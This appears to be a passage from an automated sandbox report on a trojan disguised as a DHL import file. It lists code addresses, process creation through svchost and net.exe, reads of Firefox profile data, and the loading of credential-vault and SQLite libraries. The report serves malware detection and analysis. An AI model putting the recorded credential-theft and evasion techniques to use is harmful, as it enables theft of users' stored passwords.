                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395D2F02_2_0395D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039856302_2_03985630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A095C32_2_03A095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD22_2_03903FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD52_2_03903FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F0A96E5_2_03F0A96E
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F2B3C75_2_03F2B3C7
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F0A9C75_2_03F0A9C7
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F0C9475_2_03F0C947
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F130875_2_03F13087
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F0C7275_2_03F0C727
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F0C71E5_2_03F0C71E
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeCode function: 5_2_03F14DAB5_2_03F14DAB
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F702C07_2_02F702C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F902747_2_02F90274
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FB03E67_2_02FB03E6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EFE3F07_2_02EFE3F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAA3527_2_02FAA352
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F820007_2_02F82000
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA81CC7_2_02FA81CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FB01AA7_2_02FB01AA
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA41A27_2_02FA41A2
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F781587_2_02F78158
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F8A1187_2_02F8A118
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EE01007_2_02EE0100
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F0C6E07_2_02F0C6E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EEC7C07_2_02EEC7C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF07707_2_02EF0770
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F147507_2_02F14750
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F9E4F67_2_02F9E4F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA24467_2_02FA2446
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F944207_2_02F94420
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FB05917_2_02FB0591
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF05357_2_02EF0535
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EEEA807_2_02EEEA80
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA6BD77_2_02FA6BD7
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAAB407_2_02FAAB40
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F1E8F07_2_02F1E8F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02ED68B87_2_02ED68B8
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF28407_2_02EF2840
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EFA8407_2_02EFA840
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF29A07_2_02EF29A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FBA9A67_2_02FBA9A6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F069627_2_02F06962
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAEEDB7_2_02FAEEDB
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F02E907_2_02F02E90
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FACE937_2_02FACE93
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF0E597_2_02EF0E59
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAEE267_2_02FAEE26
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EE2FC87_2_02EE2FC8
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F6EFA07_2_02F6EFA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F64F407_2_02F64F40
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F10F307_2_02F10F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F92F307_2_02F92F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F32F287_2_02F32F28
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EE0CF27_2_02EE0CF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F90CB57_2_02F90CB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF0C007_2_02EF0C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EEADE07_2_02EEADE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F08DBF7_2_02F08DBF
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F8CD1F7_2_02F8CD1F
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EFAD007_2_02EFAD00
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F0D2F07_2_02F0D2F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F912ED7_2_02F912ED
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F0B2C07_2_02F0B2C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF52A07_2_02EF52A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F3739A7_2_02F3739A
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EDD34C7_2_02EDD34C
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA132D7_2_02FA132D
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA70E97_2_02FA70E9
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAF0E07_2_02FAF0E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF70C07_2_02EF70C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F9F0CC7_2_02F9F0CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EFB1B07_2_02EFB1B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FBB16B7_2_02FBB16B
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F2516C7_2_02F2516C
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EDF1727_2_02EDF172
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA16CC7_2_02FA16CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F356307_2_02F35630
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAF7B07_2_02FAF7B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EE14607_2_02EE1460
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAF43F7_2_02FAF43F
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FB95C37_2_02FB95C3
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F8D5B07_2_02F8D5B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA75717_2_02FA7571
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F9DAC67_2_02F9DAC6
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F35AA07_2_02F35AA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F8DAAC7_2_02F8DAAC
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F91AA37_2_02F91AA3
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F63A6C7_2_02F63A6C
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAFA497_2_02FAFA49
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA7A467_2_02FA7A46
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F65BF07_2_02F65BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F2DBF97_2_02F2DBF9
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F0FB807_2_02F0FB80
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAFB767_2_02FAFB76
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF38E07_2_02EF38E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F5D8007_2_02F5D800
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F0B9507_2_02F0B950
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF99507_2_02EF9950
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F859107_2_02F85910
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF9EB07_2_02EF9EB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EB3FD27_2_02EB3FD2
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EB3FD57_2_02EB3FD5
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAFFB17_2_02FAFFB1
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF1F927_2_02EF1F92
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAFF097_2_02FAFF09
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FAFCF27_2_02FAFCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F69C327_2_02F69C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02F0FDC07_2_02F0FDC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA7D737_2_02FA7D73
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02FA1D5A7_2_02FA1D5A
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02EF3D407_2_02EF3D40
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004921407_2_00492140
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0048D0877_2_0048D087
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0048D0907_2_0048D090
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0048D2B07_2_0048D2B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_0048B3307_2_0048B330
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004957B07_2_004957B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004939F07_2_004939F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004ABD307_2_004ABD30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFE3147_2_02BFE314
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFE7D27_2_02BFE7D2
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFE4337_2_02BFE433
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFCB387_2_02BFCB38
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFD8987_2_02BFD898
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 107 times
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: String function: 007F0A30 appears 46 times
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: String function: 007EF9F2 appears 31 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F37E54 appears 107 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02EDB970 appears 262 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F6F290 appears 103 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F25130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F5EA12 appears 86 times
                Source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836861293.0000000003FDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL_IMPORT_8236820594.exe
                Source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003C93000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL_IMPORT_8236820594.exe
                Source: DHL_IMPORT_8236820594.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@10/9
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008437B5 GetLastError,FormatMessageW,0_2_008437B5
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008310BF AdjustTokenPrivileges,CloseHandle,0_2_008310BF
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008316C3
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_008451CD
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0085A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0085A67C
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0084648E
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007D42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007D42A2
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeFile created: C:\Users\user\AppData\Local\Temp\unpricklyJump to behavior
                Source: DHL_IMPORT_8236820594.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: net.exe, 00000007.00000002.3517458773.0000000000712000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2307724920.0000000000712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL_IMPORT_8236820594.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeProcess created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"Jump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeProcess created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"Jump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wintypes.dllJump to behavior
